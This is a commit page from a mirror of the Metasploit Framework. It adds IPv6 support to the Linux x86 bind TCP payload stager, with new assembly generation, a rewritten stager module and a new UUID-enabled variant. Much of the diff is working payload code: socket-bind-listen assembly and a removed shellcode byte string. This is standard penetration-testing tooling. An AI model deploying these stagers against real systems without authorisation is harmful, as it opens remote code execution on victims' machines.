infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Finalise work on the bind_ipv6_tcp stager for UUID support

bug/bundler_fix
OJ 2015-05-18 21:19:04 +10:00
parent 593f6e5fc4
commit e7f80042d4
3 changed files with 101 additions and 69 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
lib/msf/core/payload/linux/bind_tcp.rb
View File

@ -46,6 +46,10 @@ module Payload::Linux::BindTcp
false
end
def use_ipv6
false
end
#
# Generate and compile the stager
#
@ -82,7 +86,13 @@ module Payload::Linux::BindTcp
def asm_bind_tcp(opts={})
#reliable = opts[:reliable]
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
af_inet = 2
if use_ipv6
af_inet = 0xa
end
encoded_port = "0x%.8x" % [opts[:port].to_i, af_inet].pack("vn").unpack("N").first
asm = %Q^
bind_tcp:
@ -99,7 +109,7 @@ module Payload::Linux::BindTcp
push ebx ; PROTO
inc ebx ; SYS_SOCKET and SOCK_STREAM
push ebx
push 0x2 ; SYS_BIND and AF_INET
push #{af_inet} ; SYS_BIND and AF_INET(6)
mov ecx,esp
mov al,0x66 ; socketcall syscall
int 0x80 ; invoke socketcall (SYS_SOCKET)
@ -124,15 +134,38 @@ module Payload::Linux::BindTcp
pop ebx
pop esi
^
if use_ipv6
asm << %Q^
push 2
pop ebx
push edx
push edx
push edx
push edx
push edx
push edx
push #{encoded_port}
mov ecx,esp
push 0x1c
^
else
asm << %Q^
push edx
push #{encoded_port}
push 0x10
^
end
asm << %Q^
push ecx
push eax
mov ecx,esp
push 0x66 ; socketcall syscall
pop eax
int 0x80 ; invoke socketcall (SYS_BIND)
shl ebx,1 ; SYS_LISTEN
mov al,0x66 ; socketcall syscall (SYS_LISTEN)
int 0x80 ; invoke socketcall

88
modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
View File

@ -1,87 +1,41 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/linux/bind_tcp'
# Linux Bind TCP/IPv6 Stager
module Metasploit3
module Metasploit4
CachedSize = 85
CachedSize = 110
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Linux::BindTcp
def self.handler_type_alias
"bind_ipv6_tcp"
'bind_ipv6_tcp'
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind TCP Stager (IPv6)',
'Description' => 'Listen for a connection over IPv6',
'Author' => [
'kris katterjohn', # original
'egypt', # NX support
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Stager' => {
'Offsets' => { 'LPORT' => [ 0x18, 'n' ] },
'Payload' =>
"\x6a\x7d" +# push byte +0x7d
"\x58" +# pop eax
"\x99" +# cdq
"\xb2\x07" +# mov dl,0x7
"\xb9\x00\x10\x00\x00" +# mov ecx,0x1000
"\x89\xe3" +# mov ebx,esp
"\x66\x81\xe3\x00\xf0" +# and bx,0xf000
"\xcd\x80" +# int 0x80
"\x31\xdb" +# xor ebx,ebx
"\xf7\xe3" +# mul ebx
"\x53" +# push ebx
"\x43" +# inc ebx
"\x53" +# push ebx
"\x6a\x0a" +# push byte +0xa
"\x89\xe1" +# mov ecx,esp
"\xb0\x66" +# mov al,0x66
"\xcd\x80" +# int 0x80
"\x43" +# inc ebx
"\x52" +# push edx
"\x52" +# push edx
"\x52" +# push edx
"\x52" +# push edx
"\x52" +# push edx
"\x52" +# push edx
"\x68\x0a\x00\xbf\xbf" +# push dword 0xbfbf000a
"\x89\xe1" +# mov ecx,esp
"\x6a\x1c" +# push byte +0x1c
"\x51" +# push ecx
"\x50" +# push eax
"\x89\xe1" +# mov ecx,esp
"\x6a\x66" +# push byte +0x66
"\x58" +# pop eax
"\xcd\x80" +# int 0x80
"\xd1\xe3" +# shl ebx,1
"\xb0\x66" +# mov al,0x66
"\xcd\x80" +# int 0x80
"\x43" +# inc ebx
"\xb0\x66" +# mov al,0x66
"\x89\x51\x04" +# mov [ecx+0x4],edx
"\xcd\x80" +# int 0x80
"\x93" +# xchg eax,ebx
"\xb6\x0c" +# mov dh,0xc
"\xb0\x03" +# mov al,0x3
"\xcd\x80" +# int 0x80
"\x89\xdf" +# mov edi,ebx
"\xff\xe1" # jmp ecx
}
'Name' => 'Bind IPv6 TCP Stager (Linux x86)',
'Description' => 'Listen for an IPv6 connection (Linux x86)',
'Author' => [ 'kris katterjohn', 'egypt' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Convention' => 'sockedi',
'Stager' => { 'RequiresMidstager' => true }
))
end
def use_ipv6
true
end
end

45
modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb Normal file
View File

@ -0,0 +1,45 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/linux/bind_tcp'
module Metasploit4
CachedSize = 110
include Msf::Payload::Stager
include Msf::Payload::Linux::BindTcp
def self.handler_type_alias
'bind_ipv6_tcp_uuid'
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind IPv6 TCP Stager with UUID support (Linux x86)',
'Description' => 'Listen for an IPv6 connection with UUID support (Linux x86)',
'Author' => [ 'kris katterjohn', 'egypt', 'OJ Reeves' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Convention' => 'sockedi',
'Stager' => { 'RequiresMidstager' => true }
))
end
def use_ipv6
true
end
def include_send_uuid
true
end
end